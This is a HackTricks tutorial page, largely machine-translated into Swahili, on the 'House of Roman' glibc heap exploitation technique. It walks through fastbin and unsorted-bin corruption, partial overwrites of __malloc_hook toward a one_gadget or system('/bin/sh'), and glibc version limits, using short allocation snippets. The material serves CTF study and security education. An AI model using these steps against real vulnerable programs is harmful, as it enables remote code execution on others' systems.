HackTricks
House of Roman
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Taarifa za Msingi
Hii ilikuwa mbinu ya kuvutia sana ambayo iliruhusu RCE bila leaks kupitia fake fastbins, the unsorted_bin attack na relative overwrites. Hata hivyo imebeen patched.
Applicability in 2026
- glibc window: Inafanya kazi kwa ufanisi kwenye 2.23–2.27 (the how2heap PoC ilijaribu 2.23–2.25). Kuanzia 2.28, “additional checks for unsorted bin integrity” patch inafanya unsorted‑bin write kuwa haitegemeeki, hivyo mafanikio yanashuka sana. Kutoka 2.34 mbele
__malloc_hook/__free_hookziliondolewa, zikifanya target ya awali isipatikane. Tumia tu kwenye libc za zamani (au builds za desturi zinazohifadhi hooks) au kwa changamoto za CTF zinazotoa libc ya zamani. - Tcache era (≥2.26): Tcache itakula allocations zako za 0x70 na kusimamisha primitives za fastbin/unsorted. Zima (
setenv("GLIBC_TUNABLES","glibc.malloc.tcache_count=0",1);) kabla ya allocation yoyote au jaza kila tcache bin ya 0x70 kwa 7 frees ili kuizima. - Safe-linking: Inatumika kwa tcache/fastbin katika ≥2.32, lakini House of Roman inahitaji tu partial pointer overwrite of a libc address already present in fd/bk, hivyo safe-linking haimsaidii mlinzi hapa (mshambuliaji kamwe hafichi pointer mpya). Kizuizi cha kweli ni kuondolewa kwa hooks na ukaguzi wa unsorted‑bin.
Code
- Unaweza kupata mfano kwenye https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c
Lengo
- RCE kwa kutumia relative pointers
Mahitaji
- Hariri fastbin na unsorted bin pointers
- 12 bits ya randomness inapaswa kufutwa kwa brute force (0.02% nafasi) ya kufanikiwa
Hatua za Shambulio
Part 1: Fastbin Chunk points to __malloc_hook
Tengeneza chunks kadhaa:
fastbin_victim(0x60, offset 0): UAF chunk ili kuhariri pointer ya heap baadaye ili iielekeze kwenye thamani ya LibC.chunk2(0x80, offset 0x70): Kwa alignment nzurimain_arena_use(0x80, offset 0x100)relative_offset_heap(0x60, offset 0x190): relative offset kwenye chunk ya ‘main_arena_use’
Kisha free(main_arena_use) ambayo itaweka chunk hii kwenye unsorted list na itapata pointer ya main_arena + 0x68 katika fd na bk pointers zote mbili.
Sasa inatolewa chunk mpya fake_libc_chunk(0x60) kwa sababu itakuwa na pointers kwa main_arena + 0x68 katika fd na bk.
Kisha relative_offset_heap na fastbin_victim zinafanywa free.
/*
Current heap layout:
0x0: fastbin_victim - size 0x70
0x70: alignment_filler - size 0x90
0x100: fake_libc_chunk - size 0x70 (contains a fd ptr to main_arena + 0x68)
0x170: leftover_main - size 0x20
0x190: relative_offset_heap - size 0x70
bin layout:
fastbin: fastbin_victim -> relative_offset_heap
unsorted: leftover_main
*/
fastbin_victiminafdinayolekeza kwarelative_offset_heaprelative_offset_heapni offset ya umbali kutokafake_libc_chunk, ambayo ina pointer kwamain_arena + 0x68- Kubadilisha byte ya mwisho ya
fastbin_victim.fdkunafanyafastbin_victimkuelekeza kwamain_arena + 0x68.
Kwa hatua hizo za hapo juu, mshambuliaji anahitaji uwezo wa kubadilisha pointer ya fd ya fastbin_victim.
Kisha, main_arena + 0x68 si ya kuvutia sana, hivyo tuibadilishe ili pointer ielekee kwa __malloc_hook.
Tambua kwamba __memalign_hook kawaida huanza na 0x7f na sifuri kabla yake, hivyo inawezekana kuiiga kama thamani katika 0x70 fast bin. Kwa sababu bits 4 za mwisho za anwani ni nasibu kuna 2^4=16 uwezekano kwa thamani kuishia ikiweka alama pale tunapovutiwa. Hivyo BF attack inafanywa hapa ili chunk imeishe kama: 0x70: fastbin_victim -> fake_libc_chunk -> (__malloc_hook - 0x23).
(For more info about the rest of the bytes check the explanation in the how2heap example). Ikiwa brute force haitafanikiwa programu itavunjika (anzisha upya hadi itafanya kazi).
Kisha, 2 mallocs zinafanywa ili kuondoa chunks 2 za awali za fast bin, na malloc ya tatu inatengwa kupata chunk ndani ya __malloc_hook.
malloc(0x60);
malloc(0x60);
uint8_t* malloc_hook_chunk = malloc(0x60);
Sehemu ya 2: Unsorted_bin attack
Kwa maelezo zaidi unaweza angalia:
Lakini kwa msingi, inaruhusu kuandika main_arena + 0x68 kwa mahali popote yaliyoainishwa katika chunk->bk. Kwa shambulio tunachagua __malloc_hook. Kisha, baada ya ku-overwrite, tutatumia relative overwrite kuelekeza kwenye one_gadget.
Kwa hili tunaanza kupata a chunk na kuiweka kwenye unsorted bin:
uint8_t* unsorted_bin_ptr = malloc(0x80);
malloc(0x30); // Don't want to consolidate
puts("Put chunk into unsorted_bin\n");
// Free the chunk to create the UAF
free(unsorted_bin_ptr);
Use an UAF in this chunk to point unsorted_bin_ptr->bk to the address of __malloc_hook (we brute forced this previously).
Caution
Kumbuka kwamba shambulio hili linaharibu unsorted bin (hivyo pia small na large). Kwa hivyo sasa tunaweza tu kutumia allocations kutoka fast bin (programu ngumu zaidi inaweza kufanya allocations nyingine na kusababisha crash), na ili kuamsha hili lazima tufanye alloc ya ukubwa sawa au programu itakufa.
So, to trigger the write of main_arena + 0x68 in __malloc_hook we perform after setting __malloc_hook in unsorted_bin_ptr->bk we just need to do: malloc(0x80)
Hatua 3: Weka __malloc_hook kuwa system
Katika hatua ya kwanza tulidhibiti chunk iliyo na __malloc_hook (katika variable malloc_hook_chunk) na katika hatua ya pili tuliweza kuandika main_arena + 0x68 humo.
Sasa, tunatumia partial overwrite katika malloc_hook_chunk kutumia anwani ya libc tuliyoandika humo (main_arena + 0x68) ili kuonyesha kwa anwani ya one_gadget.
Hapa ndipo inahitajika kufanya brute-force kwenye bitu 12 za nasibu (more info in the how2heap example).
Hatimaye, mara anwani sahihi inapobadilishwa, aita malloc na chochea one_gadget.
Vidokezo vya kisasa & aina nyingine
- Unsorted-bin hardening (2.28+): Ukaguzi wa ziada wa uadilifu kwa unsorted chunks (size sanity + list linkage) unafanya uandishi wa classic unsorted‑bin kuwa dhaifu. Ili kuishi
_int_malloc, lazima uhifadhi viunganishofd/bkvikiwa thabiti na sizes zikionekana za kweli, jambo ambalo kwa kawaida linahitaji primitives imara zaidi kuliko partial overwrite rahisi. - Hook removal (2.34+): Wakati
__malloc_hookimetoweka, badilisha primitive ili iingie kwenye GOT/global yoyote inayoweza kuandikwa utakayoweza kutumia baadaye (mf., overwriteexit@GOTkatika binaries zisizo-PIE) au pinda kuelekea tabia ya House of Pie ya top‑chunk hijack ili kudhibititopbadala ya hook. - Any‑address fastbin alloc (romanking98 writeup): Sehemu ya pili inaonyesha jinsi ya kurekebisha freelist ya 0x71 na kutumia uandishi wa unsorted‑bin kupeleka allocation ya fastbin juu ya
__free_hook, kisha kuwekasystem("/bin/sh")na kuichochea kupitiafree()kwenye libc‑2.24 (kabla ya kuondolewa kwa hook).
Marejeo
- https://github.com/shellphish/how2heap
- https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c
- https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_roman/
- https://halloween.synacktiv.com/publications/heap-tricks-never-get-old-insomnihack-teaser-2022.html
- https://gist.github.com/romanking98/9aab2804832c0fb46615f025e8ffb0bc
- https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=NEWS;hb=glibc-2.34
- https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.